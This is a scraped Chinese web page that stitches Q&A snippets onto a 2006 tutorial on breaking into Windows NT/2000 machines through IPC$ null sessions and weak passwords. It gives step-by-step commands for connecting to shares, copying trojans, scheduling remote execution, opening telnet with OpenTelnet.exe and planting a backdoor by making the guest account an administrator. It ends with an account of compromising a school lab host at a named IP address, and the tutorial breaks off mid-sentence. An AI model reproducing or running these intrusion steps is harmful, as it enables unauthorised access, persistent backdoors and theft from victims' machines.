9游戏

ntscan变态扫描器,ntscan变态扫描器:

街酒 722

首先你先要检查你本机是否开启了135的端口。检查方法:首先打开开始,接 着点运行,然后键入cmd按下回车,这时会出来一个CMD命令的对话框,然后请在对话框中 输入以下命令:netstat -an(意思查看本机开放的端口) 初步的DOSS命令,就是一些经常。

啊D扫描出来的IP用X-Scan和ntscan变态扫描器扫不出弱口令??首先你是内网的用户 所以只能扫内网的ip 其次你的机子要突破线程限制 改到一千左右 NTSCAN,X-SCAN和流光扫描器这些现在只能扫本地ip了 所以假如你是用135端口抓鸡的话 现在只能抓本地的 本地ip可以打开“运行”输入ipconfig 可以看到 想扫外网的话 用路由器映射端口 这些教程网上有 自己区搜一下 百度是最好的老师~~~~~~~~~

局域网内可以空链接对方机,用什么方法入侵呢?

ipc$空连接使用 [ 2006-9-20 10:32:51 | By: yunlin2000 ] 目录 : 一 前言二 什么是ipc$三 什么是空会话四 空会话可以做什么五 ipc$连接所使用的端口六 ipc$连接在hack攻击中的意义七 ipc$连接失败的常见原因八 复制文件失败的原因九 如何打开目标的IPC$共享以及其他共享十 一些需要shell才能完成的命令十一 入侵中可能会用到的相关命令十二 ipc$完整入侵步骤祥解十三 如何防范ipc$入侵十四 ipc$入侵问答精选十五 结束的话一 前言网上关于ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触ipc$的菜鸟来说,简单的罗列步骤并不能解答他们的种种迷惑(你随便找一个hack论坛搜一下ipc$,看看存在的疑惑有多少)。

因此我参考了网上的一些资料,教程以及论坛帖子,写了这篇总结性质的文章,想把一些容易混淆,容易迷惑人的问题说清楚,让大家不要总徘徊在原地!注意:本文所讨论的各种情况均默认发生在win NT/2000环境下,win98将不在此次讨论之列,而鉴于win Xp在安全设置上有所提高,个别操作并不适用,有机会将单独讨论。

二 什么是ipc$IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。IPC$是NT/2000的一项新功能,它有一个特点,即在同一时间内,两个IP之间只允许建立一个连接。NT/2000在提供了ipc$功能的同时,在初次安装系统时还打开了默认共享,即所有的逻辑共享(c$,d$,e$……)和系统目录winnt或windows(admin$)共享。所有的这些,微软的初衷都是为了方便管理员的管理,但在有意无意中,导致了系统安全性的降低。

平时我们总能听到有人在说ipc$漏洞,ipc$漏洞,其实ipc$并不是一个真正意义上的漏洞,我想之所以有人这么说,一定是指微软自己安置的那个‘后门’:空会话(Null session)。那么什么是空会话呢?三 什么是空会话在介绍空会话之前,我们有必要了解一下一个安全会话是如何建立的。在Windows NT 4.0中是使用挑战响应协议与远程机器建立一个会话的,建立成功的会话将成为一个安全隧道,建立双方通过它互通信息,这个过程的大致顺序如下: 1)会话请求者(客户)向会话接收者(服务器)传送一个数据包,请求安全隧道的建 立; 2)服务器产生一个随机的64位数(实现挑战)传送回客户; 3)客户取得这个由服务器产生的64位数,用试图建立会话的帐号的口令打乱它,将结 果返回到服务器(实现响应); 4)服务器接受响应后发送给本地安全验证(LSA),LSA通过使用该用户正确的口令来核实响应以便确认请求者身份。

如果请求者的帐号是服务器的本地帐号,核实本地发生;如果请求的帐号是一个域的帐号,响应传送到域控制器去核实。当对挑战的响应核实为正确后,一个访问令牌产生,然后传送给客户。客户使用这个访问令牌连接到服务器上的资源直到建议的会话被终止。

以上是一个安全会话建立的大致过程,那么空会话又如何呢?空会话是在没有信任的情况下与服务器建立的会话(即未提供用户名与密码),但根据WIN2000的访问控制模型,空会话的建立同样需要提供一个令牌,可是空会话在建立过程中并没有经过用户信息的认证,所以这个令牌中不包含用户信息,因此,这个会话不能让系统间发送加密信息,但这并不表示空会话的令牌中不包含安全标识符SID(它标识了用户和所属组),对于一个空会话,LSA提供的令牌的SID是S-1-5-7,这就是空会话的SID,用户名是:ANONYMOUS LOGON(这个用户名是可以在用户列表中看到的,但是是不能在SAM数据库中找到,属于系统内置的帐号),这个访问令牌包含下面伪装的组: Everyone Network在安全策略的限制下,这个空会话将被授权访问到上面两个组有权访问到的一切信息。那么建立空会话到底可以作什么呢? 四 空会话可以做什么 对于NT,在默认安全设置下,借助空连接可以列举目标主机上的用户和共享,访问everyone权限的共享,访问小部分注册表等,并没有什么太大的利用价值;对2000作用更小,因为在Windows 2000 和以后版本中默认只有管理员和备份操作员有权从网络访问到注册表,而且实现起来也不方便,需借助工具。从这些我们可以看到,这种非信任会话并没有多大的用处,但从一次完整的ipc$入侵来看,空会话是一个不可缺少的跳板,因为我们从它那里可以得到户列表,这对于一个老练的黑客已经足够了。

以下是空会话中能够使用的具体命令:1 首先,我们先建立一个空会话(需要目标开放ipc$)命令:net use \\ip\ipc$ "" /user:""注意:上面的命令包括四个空格,net与use中间有一个空格,use后面一个,密码左右各一个空格。2 查看远程主机的共享资源命令:net view \\IP 解释:建立了空连接后,用此命令可以查看远程主机的共享资源,如果它开了共享,可以得到如下类似类似结果:在 \\*.*.*.*的共享资源资源共享名 类型 用途 注释-----------------------------------------------------------NETLOGON Disk Logon server shareSYSVOL Disk Logon server share命令成功完成。3 查看远程主机的当前时间命令:net time \\IP 解释:用此命令可以得到一个远程主机的当前时间。4 得到远程主机的NetBIOS用户名列表(需要打开自己的NBT)nbtstat -A IP 用此命令可以得到一个远程主机的NetBIOS用户名列表(需要你的netbios支持),返回如下结果:Node IpAddress: [*.*.*.*] Scope Id: []NetBIOS Remote Machine Name TableName Type Status---------------------------------------------SERVER <00> UNIQUE RegisteredOYAMANISHI-H <00> GROUP RegisteredOYAMANISHI-H <1C> GROUP RegisteredSERVER <20> UNIQUE RegisteredOYAMANISHI-H <1B> UNIQUE RegisteredOYAMANISHI-H <1E> GROUP RegisteredSERVER <03> UNIQUE RegisteredOYAMANISHI-H <1D> UNIQUE Registered..__MSBROWSE__.<01> GROUP RegisteredINet~Services <1C> GROUP RegisteredIS~SERVER......<00> UNIQUE RegisteredMAC Address = 00-50-8B-9A-2D-37以上就是我们经常使用空会话做的事情,好像也能获得不少东西哟,不过要注意一点:建立IPC$连接的操作会在EventLog中留下记录,不管你是否登录成功。

好了,那么下面我们就来看看ipc$所使用的端口是什么?五 ipc$所使用的端口首先我们来了解一些基础知识:1 SMB:(Server Message Block) Windows协议族,用于文件打印共享的服务;2 NBT:(NETBios Over TCP/IP)使用137(UDP)138(UDP)139(TCP)端口实现基于TCP/IP协议的NETBIOS网络互联。3 在WindowsNT中SMB基于NBT实现,而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现。有了这些基础知识,我们就可以进一步来讨论访问网络共享对端口的选择了:对于win2000客户端来说:1 如果在允许NBT的情况下连接服务器时,客户端会同时尝试访问139和445端口,如果445端口有响应,那么就发送RST包给139端口断开连接,用455端口进行会话,当445端口无响应时,才使用139端口,如果两个端口都没有响应,则会话失败;2 如果在禁止NBT的情况下连接服务器时,那么客户端只会尝试访问445端口,如果445端口无响应,那么会话失败。由此可见,禁止了NBT后的win 2000对win NT的共享访问将会失败。

对于win2000服务器端来说:1 如果允许NBT, 那么UDP端口137, 138, TCP 端口 139, 445将开放;2 如果禁止NBT,那么只有445端口开放。我们建立的ipc$会话对端口的选择同样遵守以上原则。显而易见,如果远程服务器没有监听139或445端口,ipc$会话是无法建立的。六 ipc$连接在hack攻击中的意义就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是入侵中必不可少的),如果你能够以某一个具有一定权限的用户身份登陆的话,那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,那你可就了不得了,基本上可以为所欲为了。

不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些粗心的管理员存在弱口令,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管理员们也愈加小心了,得到管理员密码将会越来越难的,因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,甚至在主机不开启ipc$共享时,你根本就无法连接,你会慢慢的发现ipc$连接并不是万能的,所以不要奢望每次连接都能成功,那是不现实的。是不是有些灰心?倒也不用,关键是我们要摆正心态,不要把ipc$入侵当作终极武器,不要认为它战无不胜,它只是很多入侵方法中的一种,你有可能利用它一击必杀,也有可能一无所获,这些都是正常的,在黑客的世界里,不是每条大路都能通往罗马,但总有一条路会通往罗马,耐心的寻找吧!七 ipc$连接失败的常见原因以下是一些常见的导致ipc$连接失败的原因:1 IPC连接是Windows NT及以上系统中特有的功能,由于其需要用到Windows NT中很多DLL函数,所以不能在Windows 9.x/Me系统中运行,也就是说只有nt/2000/xp才可以相互建立ipc$连接,98/me是不能建立ipc$连接的;2 如果想成功的建立一个ipc$连接,就需要对方开启ipc$共享,即使是空连接也是这样,如果对方关闭了ipc$共享,你将会建立失败;3 你未启动Lanmanworkstation服务,它提供网络链结和通讯,没有它你无法发起连接请求(显示名为:Workstation);4 对方未启动Lanmanserver服务,它提供了 RPC 支持、文件、打印以及命名管道共享,ipc$依赖于此服务,没有它远程主机将无法响应你的连接请求(显示名为:Server);5 对方未启动NetLogon,它支持网络上计算机 pass-through 帐户登录身份;6 对方禁止了NBT(即未打开139端口);7 对方防火墙屏蔽了139和445端口;8 你的用户名或者密码错误(显然空会话排除这种错误);9 命令输入错误:可能多了或少了空格,当用户名和密码中不包含空格时两边的双引号可以省略,如果密码为空,可以直接输入两个引号""即可;10 如果在已经建立好连接的情况下对方重启计算机,那么ipc$连接将会自动断开,需要重新建立连接。 另外,你也可以根据返回的错误号分析原因: 错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限; 错误号51,Windows无法找到网络路径:网络有问题; 错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$; 错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连; 错误号1326,未知的用户名或错误密码:原因很明显了; 错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动;错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码。

八 复制文件失败的原因有些朋友虽然成功的建立了ipc$连接,但在copy时却遇到了这样那样的麻烦,无法复制成功,那么导致复制失败的常见原因又有哪些呢?1 盲目复制这类错误出现的最多,占到50%以上。许多朋友甚至都不知道对方是否有共享文件夹,就进行盲目复制,结果导致复制失败而且郁闷的很。因此我建议大家在进行复制之前务必用net view \\IP这个命令看一下对方的共享情况,不要认为ipc$连接建立成功了就一定有共享文件夹。

2 默认共享判断错误这类错误也是大家经常犯的,主要有两个小方面:1)错误的认为能建立ipc$连接的主机就一定开启了默认共享,因而在建立完连接之后马上向admin$之类的默认共享复制文件,导致复制失败。ipc$连接成功只能说明对方打开了ipc$共享,ipc$共享与默认共享是两码事,ipc$共享是一个命名管道,并不是哪个实际的文件夹,而默认共享并不是ipc$共享的必要条件;2)由于net view \\IP 无法显示默认共享(因为默认共享带$),因此通过这个命令,我们并不能判断对方是否开启了默认共享,因此如果对方未开启默认共享,那么所有向默认共享进行的操作都不能成功;(不过大部分扫描软件在扫弱口令的同时,都能扫到默认共享目录,可以避免此类错误的发生)3用户权限不够,包括四种情形:1)空连接向所有共享(默认共享和普通共享)复制时,大多情况下权限是不够的;2)向默认共享复制时,要具有管理员权限;3)向普通共享复制时,要具有相应权限(即对方事先设定的访问权限);4)对方可以通过防火墙或安全软件的设置,禁止外部访问共享;还需要说明一点:不要认为administrator就一定是管理员,管理员名称是可以改的。4被防火墙杀死或在局域网也许你的复制操作已经成功,但当远程运行时,被防火墙杀掉了,导致找不到文件;还有可能你把木马复制到了局域网内的主机,导致连接失败。因此建议你复制时要小心,否则就前功尽弃了。

呵呵,大家也知道,ipc$连接在实际操作过程中会出现千奇百怪的问题,上面我所总结的只是一些常见错误,没说到的,只能让大家自己去体会了。九 如何打开目标的IPC$共享以及其他共享目标的ipc$不是轻易就能打开的,否则就要天下打乱了。你需要一个admin权限的shell,比如telnet,木马等,然后在shell下执行net share ipc$来开放目标的ipc$,用net share ipc$ /del来关闭共享。

如果你要给它开共享文件夹,你可以用net share baby=c:\,这样就把它的c盘开为共享名为baby共享了。十 一些需要shell才能完成的命令看到很多教程这方面写的十分不准确,一些需要shell才能完成命令就简简单单的在ipc$连接下执行了,起了误导作用。那么下面我总结一下需要在shell才能完成的命令:1 向远程主机建立用户,激活用户,修改用户密码,加入管理组的操作需要在shell下完成;2 打开远程主机的ipc$共享,默认共享,普通共享的操作需要在shell下完成;3 运行/关闭远程主机的服务,需要在shell下完成;4 启动/杀掉远程主机的进程,也需要在shell下完成。十一 入侵中可能会用到的相关命令请注意命令适用于本地还是远程,如果适用于本地,你只能在获得远程主机的shell后,才能向远程主机执行。

1 建立空连接:net use \\IP\ipc$ "" /user:"" 2 建立非空连接:net use \\IP\ipc$ "psw" /user:"account" 3 查看远程主机的共享资源(但看不到默认共享)net view \\IP 4 查看本地主机的共享资源(可以看到本地的默认共享)net share5 得到远程主机的用户名列表nbtstat -A IP 6 得到本地主机的用户列表net user7 查看远程主机的当前时间net time \\IP 8 显示本地主机当前服务net start 9 启动/关闭本地服务net start 服务名 /ynet stop 服务名 /y10 映射远程共享:net use z: \\IP\baby此命令将共享名为baby的共享资源映射到z盘 11 删除共享映射net use c: /del 删除映射的c盘,其他盘类推 net use * /del /y删除全部12 向远程主机复制文件copy \路径\srv.exe \\IP\共享目录名,如:copy ccbirds.exe \\*.*.*.*\c 即将当前目录下的文件复制到对方c盘内13 远程添加计划任务at \\ip 时间 程序名,如:at \\127.0.0.0 11:00 love.exe注意:时间尽量使用24小时制;在系统默认搜索路径(比如system32/)下不用加路径,否则必须加全路径14 开启远程主机的telnet这里要用到一个小程序:opentelnet.exe,各大下载站点都有,而且还需要满足四个要求:1)目标开启了ipc$共享2)你要拥有管理员密码和帐号3)目标开启RemoteRegistry服务,用户就该ntlm认证4)对WIN2K/XP有效,NT未经测试命令格式:OpenTelnet.exe \\server account psw NTLM认证方式 port试例如下:c:\>OpenTelnet.exe \\*.*.*.* administrator "" 1 9015 激活用户/加入管理员组1 net uesr account /active:yes2 net localgroup administrators account /add 16 关闭远程主机的telnet同样需要一个小程序:ResumeTelnet.exe命令格式:ResumeTelnet.exe \\server account psw试例如下:c:\>ResumeTelnet.exe \\*.*.*.* administrator ""17 删除一个已建立的ipc$连接net use \\IP\ipc$ /del (本教程不定期更新,欲获得最新版本,请登陆官方网站:菜菜鸟社区原创http://ccbirds.yeah.net)十二 ipc$完整入侵步骤祥解其实入侵步骤随个人爱好有所不同,我就说一下常见的吧,呵呵,献丑了!1 用扫描软件搜寻存在若口令的主机,比如流光,SSS,X-scan等,随你的便,然后锁定目标,如果扫到了管理员权限的口令,你可以进行下面的步骤了,假设你现在得到了administrator的密码为空2 此时您有两条路可以选择:要么给对方开telnet(命令行),要么给它传木马(图形界面),那我们就先走telnet这条路吧3上面开telnet的命令没忘吧,要用到opentelnet这个小程序c:\>OpenTelnet.exe \\192.168.21.* administrator "" 1 90如果返回如下信息*******************************************************Remote Telnet Configure, by refdomEmail: refdom@263.netOpenTelnet.exeUsage:OpenTelnet.exe \\server username password NTLMAuthor telnetport*******************************************************Connecting \\192.168.21.*...Successfully!NOTICE!!!!!!The Telnet Service default setting:NTLMAuthor=2 TelnetPort=23Starting telnet service...telnet service is started successfully! telnet service is running!BINGLE!!!Yeah!!Telnet Port is 90. You can try:"telnet ip 90", to connect the server!Disconnecting server...Successfully!*说明你已经打开了一个端口90的telnet。4 现在我们telnet上去telnet 192.168.21.* 90如果成功,你将获得远程主机的一个shell,此时你可以像控制自己的机器一样控制你的肉鸡了,那么做点什么呢?把guest激活再加入管理组吧,就算留个后门了5 C:\>net user guest /active:yes *将Guest用户激活,也有可能人家的guest本来就试活的,你可以用net user guest看一下它的帐户启用的值是yes还是no6 C:\>net user guest 1234 *将Guest的密码改为1234,或者改成你喜欢的密码7 C:\>net localgroup administrators guest /add *将Guest变为Administrator,这样,即使以后管理员更改了他的密码,我们也可以用guest登录了,不过也要提醒您,因为通过安全策略的设置,可以禁止guest等帐户的远程访问,呵呵,如果真是这样,那我们的后门也就白做了,愿上帝保佑Guest。8 好了,现在我们来走另一条路,给它传个木马玩玩9 首先,我们先建立起ipc$连接C:\>net use \\192.168.21.*\ipc$ "" /user:administrator10 既然要上传东西,就要先知道它开了什么共享C:\>net view \\192.168.21.*在 \\192.168.21.*的共享资源资源共享名 类型 用途 注释-----------------------------------------------------------C Disk D Disk 命令成功完成。

*好了,我们看到对方共享了C,D两个盘,我们下面就可以向任意一个盘复制文件了。再次声明,因为用net view命令无法看到默认共享,因此通过上面返回的结果,我�。

机房电脑密码怎么破?

学校公共机房电脑的一些破解1.入侵主机:主机IP为:219.221.84.129,登陆用户名有administrator及guanliji1,用NTscan变态扫描器扫到此机开了139端口,且是弱口令,用Recton--D贺免杀专用版开启23端口,开共享net share ipc$,net share admin$,net use \\219.221.84.129\IPC$ "" /user:administrator,用DameWare迷你中文版 4.5控制主机。开共享net share C$=C,net share D$=D,完全共享主机C,D盘,可以任意复制主机上的文件。

标签: